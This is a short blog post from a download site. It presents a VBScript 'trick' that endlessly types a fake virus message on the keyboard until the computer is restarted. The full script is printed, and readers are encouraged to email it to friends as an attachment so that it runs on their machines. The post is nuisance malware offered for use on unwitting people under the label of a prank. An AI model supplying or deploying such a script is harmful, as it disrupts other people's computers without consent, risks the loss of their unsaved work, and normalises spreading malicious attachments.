Moviez Phase

DOWNLOAD FREE UNLIMITED MOVIES AND MUSIC

Breaking

Thursday, August 28, 2014

Make Your Keyboard Type (Any) Message Continuously

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.
____________________________________________________________________________________

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
_____________________________________________________________________________________

Send this file to your friends as an email attachment to see the fun.

Let the fun begin!!!

No comments:

Post a Comment